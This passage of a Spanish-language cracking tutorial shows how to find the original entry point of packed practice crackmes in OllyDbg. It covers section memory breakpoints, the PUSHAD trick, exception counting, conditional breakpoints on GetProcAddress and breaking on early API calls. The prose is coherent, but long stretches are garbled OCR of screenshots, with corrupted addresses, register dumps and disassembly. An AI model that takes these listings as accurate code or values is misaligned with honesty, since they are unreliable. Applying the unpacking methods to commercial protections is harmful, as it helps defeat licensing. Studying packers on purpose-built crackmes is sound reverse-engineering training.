Vuelve a la rutina del packer, por lo cual le doy RUN de nuevo y vemos que el programa se ejecuta 
sin parar, porque ocurre esto? 

Si nos fijamos, cuando halllamos el OEP con OLLYDBG en este caso el packer varia y no se 
desempaca en la primera seccion por lo cual hay que poner un BPM ON ACCESS en otra seccion y 
no en la primera, para determinar en cual, podemos correr el crackme sin poner BPM ni nada. 
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A ASPack 2,12 UnPackMe 


Tf you umpack it write a tutorial... :) 


Una vez que aparece la ventana del mismo ya sabemos que esta desempacado en memoria, para 
saber en que seccion esta corriendo, probamos poner BPM ON ACCESS, en cada seccion, si el 
programa sigue coriendo y no para en OLLYDBG quiere decir que no esta corriendo en esa seccion 
y probamos la siguiente. 


00400000| 00001000| UnPackMe PE header | Inag|R RUE 
00401000 00001000 UnPackMe .idata Tm=alD DUE 
00402000 | 6050092000 | UnPackMe| .rsrc Actualize 

00404000 | 000020090 | UnPackMe| .text 

500406000 /| 60961000 | UnPackMe| .data Dump in CPU 
00407000| 00009990 | UnPackMe| .bss 

00410900| 0000109090| UnPackMe| IMPORTS Dump 
004110900| 000039090 |UnPackMe| .teddy 
00414000| 009001090| UnPackMe| .adata Search Ctrl-+1 
00420000 | 0BBBSADA 
004E0000| 002000 
004FB0000| 0103006 Set break-on-access F2 
O06BBBD0 | OBBFEODO 
00900000 | OBBSABGA 


B0950000 | 0OB1B00BB Set memory breakpoint on access », 
ita de Set memory breakpoint on write 


Alli pongo un BPM ON ACCESS en la primera y no pasa nada sigue como si nada, hago lo mismo 
en la segunda y nada, al poner en la tercera que empieza en 404000. 


6o4a1000| pooB1006| UnPackMe| .idata |". |Imag|R RE 
504592000 | 60002000 | UnPackMe| .rsrc resources Imag|R RUE 
50404000 600902000 UnPackMe text code Ec 
00406000 | 6000981000 | UnPackMe| .data code,d  Actualize 
60410000| 00091800 UnPackhe| INPORTS | code bl 
nPackMe code iew in Di 
00411000) 690003000 | UnPackMe! . teddy SFX, im me En 
60414000) 090001000 | UnPackMe! .adata Dump in CPU 
00420000) BBBBSODO 
004E0000| BBBB2000 Dump 
004F0000 | 00103000 
00690000 BBBFE6DOO Search Ct 
200900000) BBBSDODO 
60950090) 00010000 
AR9900MB | BARBARA Set break-on-access F2 
B09A0000 | 10BBJODA 
o iincecozci OOO Set memory breakpoint on access 
00440000 | 60091000 | SnagAA PE hea Car maras heaalemaimb am 1vibor 


Veo que para en OLLYDBG, al tratar de ver la ventana del crackme, eso quiere decir que esa es la 
seccion que se esta ejecutando, asi que repitamos el proceso desde el inicio para buscar el OEP, 
pero en este caso, poniendo un BPM ON ACCESS en la tercera seccion. 


12] File View Debug Plugins Options Window Help 


PEb AL. vie] $0) ul +] 1]e/m/T/wjn]c/+[x]8/R].]s| 3l 


Real entry point of SFX code 


ANIBIAAS a 

B64B64BB6C| . SS PUSH El 

664045000] . 89ES mov EBP | ESP 

a0404B0F| + ES 91030000 | CALL UnPackMe/0m4B43A5 

00404614] . 68 66BBBBBA |PUSH O pModule = NULL 
an4B4019| . FF1S F4114001 CALL DWORD PTR DS:[4011F41 GetModu leHandleA 
pBa04B4B1F1 . AS 47FO4000 [MOV OWORD PTR DS: [(40F607].EAX 


Ahi si se toman unos mates cafes lo que quieran y al volver esta parado en el OFP, jeje, otro 
metodo que suele funcionar bien en muchisimos packers. 


4) EL METODO DEL PUSHAD 


Este metodo funciona en una buena cantidad de packers y se basa en lo siguiente, muchos packers 
en sus primeras lineas ejecutan un PUSHAD para guardar los valores iniciales de los registros, 
luego desempacan, y antes de saltar al OEP, recuperan los valores iniciales de los registros con un 


POPAD. 
Veamos el CRACKME UPX 


ERE EST 94 40) + Elm Tim 


P 
Be 10904000 RACKME_. 004090008 
E BBSOFFFÍ WORD PTR DS: [ESI+FFFF30007 


FF 
CKME_. 00489012 


NOP 

MOU AL,BYTE PTR DS: [ESIJ 
INC ESI 

MOU BYTE PTR DS: [EDI], AL 
NC EDI 


5 E . 47 1 
OA O2COE ADD EBX.EBx 


Vemos el PUSHAD alli en el inicio, a veces puede estar un poco mas adelante, otra veces hay 
packers que hacen PUSH de cada registro uno a uno, (PUSH EAX, PUSH EBX, etc) pero para el 
caso es lo mismo guardan en el stack los valores iniciales de los registros, los cuales recuperan 
antes de saltar al OEP. 


Si nosotros pasamos el PUSHAD con f7 


70920738 
FFFFFFFF 
BO12FFFO 
BOL2FFC4 
7FFDS000 
7C91EB94 
0O12FFED 
00DB000B 
Í D4F 
FFF 
151515) 


ma 


FFF 
FDO 3 


DOOR 


ntdll.rC920738 


E han 


ernel 


End of SEH chain 


32. 70816058 


4| CRACKME_. <Modu leEntryPoint > 


Vemos que alli estan guardados los valores iniciales de los registros, y si los lee antes de saltar al 
OEP podemos ponerle un HARDWARE BPX ON ACCESS en alguno de esos valores para que 
pare justo cuando lo lea, y estaremos justo antes de saltar al OEP. 


Busquemos estos valores en el DUMP, marcando el registro ESP y haciendo FOLLOW IN DUMP 


; 7FFDS900 
12FFA4 


A 


00 

OB12FFFO 
FEFFFFFF 
70920738 


BO4B9BF1 


C1 ES 6B23 
PO Cs 6B1B 
AGD SS 6023 
Zz 6 DS 6023 
Si FS B03B 
TO GS 6008 
DO 
DO 


LastErr 
BBBBB233 
empty —Ul 


enntu At 


Increment 
Decrement 

Zero 

Set to 1 

Modify 

Copy selection to clip 
Copy all registers to « 


la Maa. 


Palla. 


Eso nos mostrara en el DUMP el contenido del stack 


no "Src ooo 


Alli vemos los valores que guardó, normalmente lo que se hace es marcar el primer byte o los 
primeros 4 bytes y colocarle un HARDWARE BPX ON ACCESS. 


Breakpoint Memory, on access 


Memory, on write 


, 
» 
08 0000 Binary > 
S 
» 


Search for 
Follow DWORD in Disassembler | 


Follow DWORD in Dump | , 
Hardware, on write 
Go to » 


| Hardware, on execution 


. Elmo. mM 


Es lo mismo que sea BYTE o WORD o DWORD, la cuestion es que pare cuando lea ese valor, 
demos RUN ahora. 


MA A A 4 485 0] 2 MO O O Y 


> 6l 
.- ES BC?2FFFF 
114 


bb 


Vemos que al ejecutar el POPAD para restaurar esos valores guardados en el stack, los lee y para, y 
justo abajo tenemos el salto al OEP, asi que estamos de parabienes aquí este metodo funciono de 
maravilla. 


Probemos en el aspack 


mx] P]0] vit: $10: 9) +: LJEJM] 
B 


BZ]. ES 43000000 
7 E9 


DOE 


DOE 


aaa aaa 


PUSH EBP 
RETN 


na ra 


Alli veo un PUSHAD, lo paso con f7 y luego ESP-FOLLOW IN DUMP 


=JECX BO12FFBO 

A EDxX 7C91EB94 ntdll.KiFastSystemCa 
EBX 7FFO7006 
ESP OUL2rFrO 
EST EFFEFEEE men 
EDI 7C920738 Decrement 


EIP 00411002 


C 1 ES 0023 zen 
PO Cs0m1B  Settol 
AD 55 6023 
z 6 Dsem23  Modify 
S 1 FS 0038 
10 
DO 
00 


es maso, Copy selection to clipt 


Lastere, Copy all registers to c 


EFL 000BB2S3 


STO empty -Ul 
STi empty Gl Fnlinw in Stark 


| Address [Hex um 22222] 


DO12FFA4188 BD? 92 7A.ECECEE EC OEA EC 12 aa Ci EC 12 00 


0012FFB4|60 70 FD 7 B00/ produ f..... 
caia dd sE 
a > 
FS 99837 oPY O 00 vSÍXmbloooooo.. 
0012FFF4|66 60 68 E Binary » A LAA 
Breakpoint » Memory, on access 
Search for > Memory, on write 
Follow DWORD in Disassembler De 
e 
Follow DWORD in Dump . Y 
Hardware, on write » Word 


Go to 


» 
Hardware, on execution _Duord_y 
a Lilas. h 


Y doy RUN. 


Bond Md IE 2 JC | 
POP _ECX 


OR ECx, ECX 
MOU_ DWORD PTR SS: [EBP+3A8],EAX 
POPAD 


y JNZ SHORT UnPackMe.604113BA 
1000000 |MOU EAX,1 


PUSH UnPackMe. 00464000 


DODOO 
Fabada 


Vemos que para alli justo antes del salto al OEP que en este caso es un PUSH 404000 y luego un 
RET si traceamos con f7. 


EXBRORREFRRSS LETIEIEEETE ME 


E WAIT Real entry point of SFX cod 
60464061] . DBES FINIT 
004040031 . %B WAIT 
00404 . DBE2 FCLEX 
B6404006| . 0920 4006040561 FLDCW WORD PTR DS: [406000] 
BB4B4BBC| . 5 PUSH _EBP 
904049090 ES MOU EBP,ESP 
604504B0F - 391030000 
B64B4B14| . $68 BABBBBBB |PUSH M pModule = NULL 
BaB4B4B19| . FF1S F4114001 CALL DWORD PTR DS:[4011F41] GetModu leHandleA 
ARGAJAIFI! . AR AZFAGTARA 1 MANU NMARA PTR NS: 144AFAM?1. FAX 


Llegamos al OEP perfectamente 


Debemos decir que muchos packers nuevos vienen protegidos contra este metodo, pero bueno, hay 
que conocer de todo, y intentarlo para saber si va o no. 


Sigamos con mas metodos posibles. 


5) PARA PROGRAMAS EN VISUAL BASIC (NATIVE O PCODE) 


Bueno es muy sencillo hallar el OEP de programas de VB empacados, ya que como vimos siempre 
hay un PUSH y un CALL a la api de VB, al inicio, asi que utilizo el OLLYDBG para VB y cuando 
arranco el programa y estoy parado en el entry point, voy a M y busco la dll de visual, y en la 
seccion code de dicha dll, le coloco un BPM ON ACCESS. 

De esta forma el programa se descomprimira y parara justo en la primera linea que ejecute la dll de 
visual basic, y en la primera linea del stack tendre la direccion de retorno del call inicial, con lo cual 
yendo a esa direccion, justo arriba estaran el push y el call incial que se encuentran en el OEP, con 
lo cual lo habre hallado. 

Es cierto que el metodo del OLLYDBG modificado para VB tambien funcionara si pongo un BPM 
ON ACCESS en la primera seccion del programa directamente, pero hay packers que protegen esto 
muchisimo, por lo cual se pueden intentar ambos metodos y por eso lo dejo asentado aquí ya que 


ambos funcionan. 


No veremos ejemplos en este caso pues es muy sencillo de entender, mas adelante si nos toca un 
crackme de VB empacado veremos el ejemplo en la practica. 


6)METODO DE LAS EXCEPCIONES 


Si tenemos un packer que genera muchas excepciones al desempacarse, el metodo es el siguiente, 
usaremos el crackme bitarts que adjunto. 


Lo abrimos en el OLLYDBG para VB, protegido con los plugins necesarios para no ser detectado. 


Coloco todas las tildes en EXCEPTIONS y lo corro en OLLYDBG hasta que veo que arranca 
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A 


Crunch 5.0.0 UnPackMe 
Compression + Encryption 


Tf you umpack it write a tutorial... :) 


una vez que arranco me fijo en el LOG del OLLYDBG apretando L. 


0a4erSEO 


19: 
GSaSEF IA 
BO46ECA1 
DOBSOBSE 
00456EF14 
BO4E6ECAL 
DOBADOSE 
0U45EF14 
BO46ECA1 
OBBCOBSE 
BO46EF 14 
0046ECA1 
DOBEDOSE 
BOB45EF14 
BO4EECAL 


ADO 


DOS 


DOS 
de 


A Elm) 1/9) 81 cl 1/£J8)2]-. 5) 


Access 


£| New thread with ID 


Access 


2: [EDX1.33 


Modification of 
Shift constant ou 


En 
+m 


violation when reading [000000909] 
BBBBOCEC created 
violation when reading [004000000] 


Integer division by zero 
INT3 command at 0BBSOOSE 


Access 


violation when reading [000900009] 


Integer division by zero 
INT3 command at BBBABOSE 


Access 


violation when reading [000090909] 


Integer division by zero 
INT3 command at BBBCOBSE 


Access 


violation when SIDE (0000090907 


Integer division by zer 
INTS command at aBBEOOSE 


Rocess 
Integ 
Thresd 


INTS command at bitarts_ 


Module 
Module 
Module 
Modu le 
Module 
Module 
Modu le 
Modu le 
Module 
Module 
Un load 
Un load 
Module 
Modu le 
Module 
Module 
Module 
Modu le 
Module 
Module 
Module 
Modu le 
Module 
Module 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 
Un load 


violation when reading [60000000] 


er division by zero 


BBOBACEC terminated, exit code 46FE79 (4652665. ) 

. DO46ESSF 

C: MWINDOWS>»system32numdmxfim. dll 

C:MWINDOWS3system32nustheme. dll 

Co MWINDOWS3system32aMSCTF. dll 

Ci WINDOWS sy stemB2oRICHEDSZ. DLL 
¿MWINDOWS sy stemS2sRICHED26.d11 

C: Archivos de programa"Yahoot*Messenger+idle.d 
¿MArchivos de A tan 

CidArchivos de programasSunbelt SoftwarerPersonal Firewall 4sgk 

¿MWINDOWS3system32wtsapi32.dll 

¿MWINDOWS3system32aWINSTA. dll 

¿WINDOWS system32vW INSTA. dll 

WINDOWS system32uwtsapi32.dll 


le 


MN 

N . 
WINDOWS sy stemB2xCRYPTI2. 
WINDOWS Sy stem32oMSASNI. d 
WINDOWS sy stem32xCRYPTUT. 
WINDOWS Sy stem32aWINTRUST 
WINDOWS Sy stem32s 1 MAGEHLP 
WINDOWS Sy stemB2NETAPIS2 
WINDOWS sy stemS2sWIMNINET. 
WINDOWS sy stem32vWLDAP32. 
WINDOWS sy stemS2oNETAPIS2 
WINDOWS sy stem32xCRYPTUT. 
WINDOWS sy stem32WINTRUST 
WINDOWS Sy stem32s 1 MAGEHLP 
WINDOWS Sy stem32uLDAP32. 
WINDOWS sy stemS2aWIMNINET. 
WINDOWS Sy stem32shdocuw. 
WINDOWS sy stem32sCRYPT32. d 
WINDOWS sy stem32aMSASN1. dll 

MArchivos de REIR £8xSna9AR. dll 
WINDOWS sy stemB2vOLEACC. dl 

MU INDOWS Sy stem32aMSUCP6D. E 


Me fijo la ultima excepcion que se produjo, que no sea producida en la primera seccion o sea que no 


se haya producido en la ejecucion del programa si no antes, en el desempacado, en este caso la 
ultima se produjo en 46e88f. 


Ahora reinicio y quito todas las tildes en exceptions solo dejo la 1ra. 


= Debugging options 
Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events — Exceptions | Trace | SEX | Strings | Addresses | 


[4 Ignore memory access violations in KERNEL32 


lgnore (pass to program) following exceptions: 
T INT3 breaks 
T Single-step break 
T Memory access violation 
TF Integer division by O 
Invalid or privileged instruction IS 
T” ANFPU exceptions 


Ignore also following custom exceptions or ranges: 


CODOOOSF [FLOAT INEXACT RESULT] Add last exception 
¿Add range 
Delete selection 


y] Undo | Cancel | 


Y doy RUN y cada vez que para voy pasando con SHIFT+ f9 hasta que llego a la ultima que anote, 
en este caso 46e88f. 


pa PO E A A A a e Sa EA ESOS IE HER JA 
S3B00 MOU EAX, DWORD PTR DS: LEAXJ 
64:2F05 000890Í POP DWORD PTR FS:10] 

3304 M4 ADD ESP, 4 


RETN 
DEC EBP 


Alli paro como no es la que anote, hago shift + f9 para saltar la excepcion, recordemos que como es 
un INT3 OLLYDBG parara en la direccion justo siguiente o sea 46e890. 


A A PRA El 2 EMT 


ES 23000000 
INC ESP 


lóca ADC AL,BL 
6321 ADD ESP, DWORD PTR DS: [ECX] 
64:5F05 0B0Bgal POP DWORD PTR FS:[8] 


ES 17000000 
nE12 


ETST MARA PTR NA: FEMY1 


Alli estamos justo en la ultima excepcion generada por el desempacador, antes que arranque el 
programa. 


Aquí tengo varias posibilidades, podemos poner un BPM ON ACCESS en la seccion code, y 
muchos se preguntaran porque no lo coloque en un inicio, y la respuesta es porque muchos packers 
pueden detectar el BPM si lo coloco desde el inicio, y al llegar aquí, quizas ya paso la detección, 


probemos si va. 


Ahora no olvidemos que debemos apretar SHIFT mas f9 ya que estamos en una excepcion. 


mo 


rumor 


ls 3/51515) 
DO3FOD0n 
00400000 
0401000 
00446000 
00457000 
00460000 
00463000 
00468000 
B04CO00n 
0530000 
00590000 
DOSADOGO 
D09AD00a 
00980000 
B09CO00B 
B0A40000 
BOASOOOO 
51151515) 
D0A7D00a 
0070000 


00004000 
00002000 
00091000 
B0B4AG0a 
ls 1s1:]m5]515] 
51515151515] 
15151515J0151515] 
/s1515f=151512] 
00043000 
]slsl91=151515] 
00052000 
00163000 
OOBFEGOO 
15151515J01515]5] 
D0BB2000 
00001000 
00001000 
00061000 
00061008 
00061008 
00001000 


bitarts_ 
bitarts_ 
bitarts_ 
bitarts_ 
bitarts_ 
bitarts_ 
bitarts_ 


UI GI II 


«text 
«rdata 
«data 
«idata 
¿«PSrc 
«edata 


TI 


Priv] Ru 
Map 

Imag|R 
Tman R 


Ru 
R 


RWE 
AME 


| 


Enter 


ps psades 
Actualize 
View in Disassembler 
Dump in CPU 
Dump 


Search Ctrl+B 


Set break-on-access 


Set memory breakpoint on acces 


Set memory breakpoint on write 


np 


EXE en] vis] $00) U] + ujejmit]iwu[c],/x/8]R/-.] 5] ¿li 


Dado 
aoatada 


e 


Sí 


ODO 


Alli paro en el OEP, podemos probar si el packer detectaba el BPM realizando esto mismo desde el 


inicio. 


Reinicio y coloco todas las tildes en exceptions nuevamente y voy a M y le coloco un BPM ON 
ACCESS en la primera seccion y como estoy usando el OLLYDBG para detectar OEPs pues me 
voy a tomar unos mates jeje, ya que vemos que en este caso tardara unos cuantos largos minutos, en 


llegar al OEP. 


8BEC 

6R FF 

63 60BE4500 
68 [3924200 
64:A1 00000095 
50 

56 

8965 ES 

FF1S DCOA4600 
3302 


8AD4 
8915 34E64500 
8BCc8 


MOU EBP,ESP 
PUSH -1 


ADD ESP, -58 
PUSH EBX 
PUSH ESI 
PUSH_EDI 


20R EDX, EDX 
MOU DL, AH 


MOV ECX, EAX 


PUSH bitarts_.00450E60 
PUSH _bitarts_.00429208 
MOU EAX, DWORD PTR FS: [6] 
PUSH_EAX 


64:8925 BOBA! MOV DWORD _PTR FS: [0],ESP 
8304 AS 


MOU DWORD_PTR SS: [EBP-18],ESP 


MOU DWORD _PTR DS: [45E634],EDX 


kernel 32. GetVersion 


[c] File View Debug Plugins Options Window Help 


Vemos que llego perfectamente pero es bueno conocer el metodo de las excepciones para cuando el 
BPM ON ACCESS sea detectado por el packer y en ese caso hay que llegar lo mas cerca posible 


NADANDO 


EXIEanya 


10m 


PUSH EBP 

MOU EBP,ESP 
PUSH -1 

PUSH bitarts_ 


68 C8924200 PUSH _bitarts_ 
64:A1 00000000| MOU EAX, DWORD 


50 PUSH_EAXx 
64:2925 BOBBGB! MOV DIWORD_PTR 
8304 AS 


55 

8BEC 

6R FF 

63 6BDE4500 


SH El 
mou DUORO PTR 


S0R EDXx, EDX 
MOU DL, AH 
MOU DWORD _PTR 


5 ES 
a DCoA460B 


4 
34E64500 


MOU ECX, EAX 


3 
31E1 FFO00000 ¡AND ECX.BFF 


. BO450EGO 
.00429208 


dl ul + 1/e)mT1/w]n/c]/[k]8]R]-.. s 


PTR FS: [6] 
FS: [0], ESP 


SS: [EBP-18],ESP 


DS: [45£634],EDX 


kerne132.GetVersion 


del OEP, para evitar la deteccion del mismo. 


Vemos que en este packer incluso usando el metodo del buscador de OEPs que trae el OLLYDBG 
tambien para perfectamente en el mismo y rapido. 


[c] File View Debug Plugins Options Window Help 


a EM] EPAE ESPE al + 1/2jm]T/w]n/c]4[x]8]R]-.s| 33 


SPEC 
6A FF 
63 6BBE4500 
68 CS924200 


an B0006B 
64:3925 BOBO 
38304 AS 


[MANE] 30 18 


DODO 
Poo SOS 


mod! ES, ESP 
PUSH - 
PUSH as 


PUSH_E 


ADD ESP 
PUSH EBX 


mint rat 


dl 1] 


PUSH bitarts_ 
mou EEAn DWORD PTR FS: [8] 


. DO4SDECO 
«00429208 


mMOU DIORO_ETR FS: [07,ESP 


PUSHFD 


DS: [ESIJ,AL 
DS: [ERAXJ], AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [EAXJ, AL 
DS: [ERXJ,CH 
DS: [EAXJ, AL 
SS: [EBP-18], DL 
DS: [EAXJ, AL 
DS: [EAXI, AL 


Que si traceamos con f'7 unas lineas llegamos a un PUSHAD 


Real entry point of SFX == 


SE handler installation 


Hasta el metodo del PUSHAD funciona perfectamente, vemos en el inicio 


Saa] €: $5] 23) "aj MN OS M0 000 000 100 E E 


+] $10) 1] + LjejmitiwH[c]//k]B]R/».. 


E e si] 


PUSH EBP 


PUSHFD 

SUB EAX, DWORD PTR SS: [EBP+7FCI 
MOV DWORD _PTR SS: CEBP+7E8],EAXx 
PUSH DWORD PTR SS: [ESP+20] 


Lo pasamos con f7 y marcamos ESP-FOLLOW IN DUMP 


ñ 
( 


Breakpoint 
Search for 
Follow DWORD in Disassembler 


Hard e, 0 CCess 
Follow DWORD in Dump ardware, on acce Byte 
Go to > Hardware, on write »| Word 


Hardware, on execution 
w Hex r 


Memory, on access 
Memory, on write 


Damos RUN 


1d lodo] lo [A cl ld a PE 2H lc li Y] Y Y Y Y Y | 


PTR FS: [6] 


POP DWORD 
ADD ESP, 4 
POP EBP 

POPAD 


RETN 
PUSH EDI 


Y O0 
O 


nd uno 


Y para cuando lee los valores guardados en ese POP, traceo con f7 hasta el ret al pasarlo llego al 
OEP. 


mo A rd E A 


EXE ErE EEE ESPE a] +] 1jejmt]wn[c]//x]8]R/-]s] EF] 


Real entry point of SFX code 


m0 ESP | ESP 
PUSH -1 

PUSH bitarts_.00450E65 
PUSH bitarts_.00429208 SE handler installation 
21 MOU EAX, DWORD PTR FS: [01 


PUSH_EAX 
21 MOV DWORD_PTR FS:[07,ESP 
DD ESP, -58 


pa] 


SH_EDI 
_—_JMOU DWORD _PTR SS: [EBP-18],ESP 
S0R EDX, EDX 


kerne 132. GetVersion 


10M DNA 


20000000 


, 
y] 
7] 
5] 


Mali ma 


7)EL METODO DE UNA API MUY USADA POR EL DESEMPACADOR 


Reinicio este BIT ARTS con el OLLYDBG para OFEPs, con todas las excepciones marcadas y 
buscare una api muy usada normalmente puede ser GetProcAddress, Load Library tambien es muy 
usada, ExitThread, esto variara según el packer, probemos el metodo con GetProcAddress. 


Commancd ? GetProcAddress w | HEX: 7C8DACZ8 - 


Alli veo en la commandbar la direccion de la api le pondre un BP 


PITA] O UU UU UU: UU UN UN UU UU UU UU UU Y 


Commanc Bp GetProcAddress 
A 


En la api elegida, al menos debe poder ponersele BP, si no se puede desde la comandbar habra que 
buscarla a mano y ponerselo directo. 


Demos RUN. 


AAA PORRES 3) Y) Y Y Y YO Y Y Y 
MOU EDI,EDI 
PUSH_EBP 
MOU EBP,ESP 

PUSH ECx 

PUSH ECXx 

PUSH EBXx 

PUSH_EDI 

MOU EDI,DWORD PTR SS: [EBP+C] 
MANU FAX. AFFFF 


Ahora cambiare este BP por un BP CONDICIONAL LOG que no pare, solo LOGUEE. 
3%] +0: 9] + LJEJMT|WH] 


Backup » 
Copy » 
Binary » 
Assemble Space BP+C] 
Label ] 
Comment 
Toggle 
Run trace »|  Conditionmal 
Conditional log 
Er y EEN 


Condition: 
Explanation: Expression: 


| ” ] = [tesp] ” ] 
Decode value of expression as: [Assumed by expression 1 


Never On condition UN Pass count [dec.] 


mn — 


Pause program: (e o 


C 
Log value of expression: c c Oj 
(e 


Log function arguments: c Cc 


If program pauses, pass following commands to plugins: 


Ponemos que nunca pare, pero que loguee siempre y que ademas nos loguee el valor de [esp] o sea 
el valor de retorno, para poder saber desde donde fue llamada la api, limpiamos el LOG, haciendo 
click derecho-CLEAR LOG. 


D 
MOU EDI,DWORD PTR SS: [EBP+C] 
MOU EBX,BFFFF 
CMP EDI,EBX 


PIUISH FAT 


3B7D_6C 
EB_FFFFOG6B 
3BFE 

Laa 57100008 


DOI 


Coded by Teddy Rogers / SnD Len 2005 


Crunch 5.0.0 UnPackMe 
Compression + Encryption 


If you unmpack it write a tutorial... :) 


Damos Run hasta que arranque el programa y miraremos en el LOG la ultima llamada a la api que 
no sea hecha desde la primera seccion. 


GUI: UTA 

CALL to GetProcAddress 
COND: 1M047009A 

CALL to GetProcAddress 
COND: M047009A 

CALL to GetProcAddress 
COND: 00470094 

CALL to GetProcAddress 
COND: 1M047009A 

CALL to GetProcAddress 
INT3 command at BBBEDOSE 


14 | Access violation when reading [90400900] 


Integer division by zero 

Thread BBBBBFCS terminated, exit code 46FE79 (4652665. ) 
INT3 command at bitarts_.0046E88F 

COND: B0428C2B 


¡CALL to GetProcAddress from bitarts_.00428C25 


hModule = 7C8960000 (kernel32) 


ProcNameOrOrdinal = "IsProcessorFeaturePresent” 
Madula Pas llTNTOIOMIOs currar DD rre rr mol 


Vemos que hay todas llamadas desde el descompresor, hasta que la siguiente es desde 428c2B que 
ya es desde la primera seccion o sea que corresponde al programa, o sea que la ultima vez que usa 
el descompresor esta api, es cuando [esp]==47009A, asi que podemos poner como condicion que 
pare cuando se de eso. 


Reiniciemos. 


PA Pl! fic jaa LL di a AD diia a 2) 3 Y PS PS 9 4 Pp y | 


Address |Module  |Active Disassemb ly Corame 


YCSBAC2S kernel32 Log MOU EDI, OS 


Remove Del 
Disable Space 


Follow in o Enter 


Editemos el BP”PX CONDICIONAL 


Modify conditional log breakpoint at kernel32.GetProcAddress 


Condition: . 
[espl==47009a3 - 
Explanation: Expression: 
| ” ] = lespl Y ] 
Decode value of expression as: [Assumed by expression =] 
Ne ondition Always Pass count [dec.] 
Pause program: o (e E ho. |] 
Log value of expression: 2 o (e 
Log function arguments: Cc Cc 1 


lf program pauses, pass following commands to plugins: 


Cancel | 


Ahora le colocamos la condicion y ponemos la tilde para que pare ON CONDITION 


Y damos RUN 


bb4bb9A [bros 1 GetProcAddress from bitarts_.B047009€ 
alsTsTsTs 1Modu le = 


DOE 
DI 


Alli vemos que paro, este metodo se puede completar como antes poniendo BPM ON ACCESS en 
la seccion CODE, para evitar la deteccion del BPM aunque tiene como problema que muchos 
nuevos packers detectan el BPX en las apis, por lo cual muchas veces conviene no hacerlo en la 
primera linea de la api si no en el RET de la misma, el metodo es similar, la idea es buscar que pare 
lo mas cerca posible antes del oep ya sea para poner un BPM ON ACCESS o ya sea para tracear 
desde aquí con el trazador automatico que tiene el OLLYDBG (TRACE INTO) 


Si hemos llegado bastante cerca del OEP, tendremos mas suerte y habremos elegido bien la api, si 
no, pues deberemos cambiar de api, si miramos el LOG de este programa vemos que una de las 
cosas que hace antes de arrancar este, es terminar un thread 


| Access Violation when reading [000000067 
5| New thread with 10 0000006890 created 
Access violation when reading [004440404007 
Integer division by zero 

INT3 command at BOBSOASE 

Access Violation when reading [0040400096] 
Integer division by zero 

INT3 command at BOBABBSE 

Access violation when reading [004B4BBBB7 
Integer division by zero 

INT3 command at BOBCOBSE 

Access violation when idad [0000009087 
Integer division by zer 

INT3 command at opREOSSE 

=) ippo violation when reading [00000098] 
SEC teger division by zero 

Mreza 66600080 terminated, exit code 46FE79 (46526€ 
INT3 command at bitarts_.0046E885F 
Module C:WWINDOWS*system32 ummm. dll 
Module Ci 9WINDOWS+system32uuxtheme. dll 
Module Ci WINDOWS system32nMsCTF.dll 
Module Ci 95wWINDOWS+system32RICHED32. DLL 


Por lo cual tanto poner un BP ExitThread como cambiar en el OLLY la configuracion para que pare 
cada vez que se cierra un thread es posible tambien. 


ES Debugging options 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug Events | Exceptions | Trace | SEX | Strings | Addresses | 


Make first pause at: 
€ System breakpoint 
C Entry point of main module 
(* inMain (if location is know) 


Break on new module (DLL) 
[Break on module [DLL] unloading 
[Break on new thread 
ÍV” Break on thread end 

Break on debug string l 


Undo | Cancel | 


Demos RUN 


ESP, DWORD PTR SS: [ESP] 
A ESP, DWORD PTR SS: [ESP] 


90 P 
805424 08 EDX, DWORD PTR SS: [ESP+8] 
CD 2E T 2E 


para alli al terminar el thread 


Real entry point of SFX code 


PUSH _EBP 
MOU EBP,ESP 
PUSH -1 

PUSH bitarts_.B0450E60 
PUSH bitarts_.00429208 SE handler installation 
64: A1 e tl PTR FS: [6] 


50 

64:38925 BOBO MOV DWORD _PTR FS:[0],ESP 
8304 AS ADD ESP, -58 
PUSH EBX 

.« 56 PUSH ESI 

.« 57 PUSH EDI 


8965 ES MOU DWORD PTR SS: CEBP-18],ESP 
FF1S DCOn960! CALL DWORD PTR DS: [469AD01 kerne 132. GetVersion 


DAA Pr ma 


ARNM O Dn 


)1000000000 000 


Alli poniendo el B”PM ON ACCESS en la seccion CODE parara perfectamente tambien. 


S)METODO DE LA PRIMERA API EJECUTADA POR EL PROGRAMA 


Este metodo es poner un BP directamente en una api sospechosa de ser la primera que ejecuta el 
programa, normalmente los programas ejecutan al inicio GetVersion, GetModuleHandleA, con 
mirar unos cuantos programas desempacados obtendremos una lista de las apis mas usadas al inicio 
no son muchas, en el caso del bitarts vemos que es GetVersion, en el Cruehead es 
GetModuleHandleA, por ejemplo probemos en el BIT ARTS con BP GetVersion. 


945/1850] 66 66 00 00 6a BOB DO BO Ba Ba Ba Ba 1 


>ommand Bp GetWversion y] W 


Arogram entry point 


Doy RUN 


0042710C]| RETURN_to bitarts_.0042/10C from kernel32. GetVersion 


2% bB12FF4C]| 7C920738|ntdll.1C920738 
=/90012FFSO0| FFFFFFFF 
—19012FFS54| 0046BEFS|bitarts_.0046BBFS 
0n1; z =) 
61 


Me debo asegurar que la llamada sea hecha por el programa o sea, desde la primera seccion. 


Cuando para miro el primer valor del stack que es la direccion de retorno y voy alli. 


A 


ba42710C 


EA uoi2FF4C| 7C920738|/1 Address > 
=9012FFS0| FFFFFFFF 
=1 00 12FF54 Q94cBars | Show ASCII dump 
bHn12 53 
eB12 74726174 Show UNICODE dump 
155 76655F73 
Ba 61756061 Lock stack 
901: SEGF6974 
00 2Ee2eS?S Copy to clipboard Ctrl4+C 
1212] i 
rate JE] al 
1515) H 
de gadnecos | Edit Ctrl+E 
Js 
. da0bina? Push DWORD 
98 Pop DWORD 
Bn [alafsfs[5]51513] 
90 ERES Search for address 
0D OB12FFFO Search for binary string Ctrl+B 
E] 
1413] 
de e 
1515] : 
laa) om12FFE6G!|1  Gotoexpression Ctrl+G 
1]5 pBa429203 
y | 90 BO4S5UDEGO 
2 or FFFFFFFF no. 


USH_EBP Real entry point of SFX code 
MOU EBP,ESP 

PUSH -1 

PUSH bitarts_.B0450E60 
PUSH bitarts_.B0429203 SE handler installation 
04 MOU EAX, DWORD PTR FS: [07 
PUSH_EAX 

MOU DWORD _PTR FS: [0],ESP 
ADD ESP, -58 


MN MID NN A SS mim 


0000 0 0) 0 00D 1) 


1D 


EDI 
